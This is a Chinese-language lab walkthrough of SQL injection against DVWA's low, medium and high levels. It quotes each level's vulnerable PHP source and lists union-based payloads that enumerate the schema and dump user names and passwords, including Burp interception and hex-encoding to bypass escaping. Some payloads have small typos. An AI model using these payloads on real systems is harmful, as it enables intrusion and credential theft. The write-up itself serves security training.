low等級 代碼如下: 1 <?php 2 3 if( isset( $_REQUEST[ 'Submit' ] ) ) { 4 // Get input 5 $id = $_REQUEST[ 'id' ]; 6 7 // Check database 8 $query = "SELECT firs ...
low等級
代碼如下:
1 <?php 2 3 if( isset( $_REQUEST[ 'Submit' ] ) ) { 4 // Get input 5 $id = $_REQUEST[ 'id' ]; 6 7 // Check database 8 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 9 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); 10 11 // Get results 12 while( $row = mysqli_fetch_assoc( $result ) ) { 13 // Get values 14 $first = $row["first_name"]; 15 $last = $row["last_name"]; 16 17 // Feedback for end user 18 echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 19 } 20 21 mysqli_close($GLOBALS["___mysqli_ston"]); 22 } 23 24 ?>
如上圖,代碼並沒有對輸入進行過濾,存在sql註入漏洞
下麵開始攻擊:
1.判斷是否存在註入
輸入 1 ---返回正確
輸入 1’ ---返回錯誤
輸入 1 and 1=1 ---返回正確
輸入 1 and 1=2 ---返回正確
輸入 1‘ and ’1‘=’1 ---返回正確
輸入 1‘ and ’1‘=’1 ---返回正確
輸入 1‘ and ’1‘=’2 ---返回錯誤(到了這裡得出應該存在字元型註入,下麵繼續驗證)
輸入 1‘ or ’1‘=’1 ---返回正確(返回很多結果,證明存在字元型註入)
2.猜解查詢SQL語句中的欄位數
輸入 1‘ or 1=1 order by 1# ---返回正確
輸入 1‘ or 1=1 order by 2# ---返回正確
輸入 1‘ or 1=1 order by 3# ---返回錯誤(返回結果---Unknown column '3' in 'order clause' 證明欄位數為2)
3.確定欄位順序
輸入 1' or 1=1 union select 1,2# ---返回兩組結果(證明執行的sql查詢語句為:select Frist name,Surname from 表 where ID='id')
4.確定資料庫
輸入 1' or 1=1 union select database(),2# ---確定資料庫為 dwva
5.猜解表名
輸入 1' or 1=1 union select 1,table_name from information_schema.tables where table_schema='dvwa' # ---確定表名為 guestbook 和 users
6.猜解列名
輸入 1' or 1=1 union select 1,column_name from information_schema.columns where table_schema='dvwa' and table_name='users' # ---爆出8個列名user_id,first_name,last_name,user,password,avatar,last_login,failed_login
7.猜解數據名
輸入 1' or 1=1 union select 1,concat(user,'-',password) from users # ---爆出所有數據
medium
代碼如下:
1 <?php 2 3 if( isset( $_POST[ 'Submit' ] ) ) { 4 // Get input 5 $id = $_POST[ 'id' ]; 6 7 $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 8 9 $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 10 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 11 12 // Get results 13 while( $row = mysqli_fetch_assoc( $result ) ) { 14 // Display values 15 $first = $row["first_name"]; 16 $last = $row["last_name"]; 17 18 // Feedback for end user 19 echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 20 } 21 22 } 23 24 // This is used later on in the index.php page 25 // Setting it here so we can close the database connection in here like in the rest of the source scripts 26 $query = "SELECT COUNT(*) FROM users;"; 27 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); 28 $number_of_rows = mysqli_fetch_row( $result )[0]; 29 30 mysqli_close($GLOBALS["___mysqli_ston"]); 31 ?>
中等難度中對特殊字元進行了轉義,並且將輸入框改為下拉菜單,防止註入。
我們可以通過burpsuit抓包後修改提交數據來進行惡意註入。
下麵開始攻擊:
1.判斷註入類型
選擇1,提交,抓包後更改為 (此操作後續簡寫為抓包)
1‘ and 1=1 ---返回錯誤
1 and 1=1 ---返回正常(說明註入類型為數字型註入)
2.判斷欄位數
抓包
1 order by 1# ---返回正常
1 order by 2# ---返回正常
1 order by 3# ---返回錯誤(欄位數為2)
3.判斷欄位順序
抓包
1 union select 1,2# ---返回正常
4.猜解資料庫
抓包
1 union select 1,database()# ---成功爆出資料庫 dvwa
5.猜解表名
抓包
1 union select 1,table_name from information_schema.tables where table_schema=‘dvwa’# ---返回錯誤(此處的錯誤是由於存在字元 ‘ ,可以轉換成16進位然後提交)
1 union select 1,table_name from information_schema.tables where table_schema=0x276476776127# ---返回正常(只能爆出admin表)
1 union select 1,table_name from information_schema.tables where table_schema=0x64767761# ---正常爆出(這裡和上一句的區別在於轉換16進位的時候,上一句轉的是 ‘dvwa’ ,這一句轉的是 dvwa ,轉換的時候沒有加‘,需要註意!)
也可以這樣
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # ---爆出表名guestbook,users
6.猜解列名
抓包
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 # ---爆出列名
7.猜解數據名
抓包
1 union select concat(user),concat(password) from users# ---爆出所有數據名
high
代碼如下:
1 <?php 2 3 if( isset( $_SESSION [ 'id' ] ) ) { 4 // Get input 5 $id = $_SESSION[ 'id' ]; 6 7 // Check database 8 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 9 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' ); 10 11 // Get results 12 while( $row = mysqli_fetch_assoc( $result ) ) { 13 // Get values 14 $first = $row["first_name"]; 15 $last = $row["last_name"]; 16 17 // Feedback for end user 18 echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 19 } 20 21 ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); 22 } 23 24 ?>
high級別對提交參數加了一個 limit 1 ,依次來控制輸出參數為一個。
此處可以利用low中的註入破解,因為註入過程中用到了#,將後面的語句註釋掉了。
1.判斷註入類型
1' or '1'='1 ---字元註入
2.判斷欄位數
1' or 1=1 order by 2# ---返回正確
1' or 1=1 order by 3# ---返回錯誤
3.判斷欄位順序
1‘ or 1=1 union select 1.2# ---返回正常
4.猜解資料庫
1‘ or 1=1 union select 1,database()# ---爆出資料庫名
5.猜解表名
1' or 1=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # ---爆出表名
6.猜解列名
1' or 1=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' # ----爆出列名
7.爆出數據
1' or 1=1 union select group_concat(user),group_concat(password) from users # ---爆出數據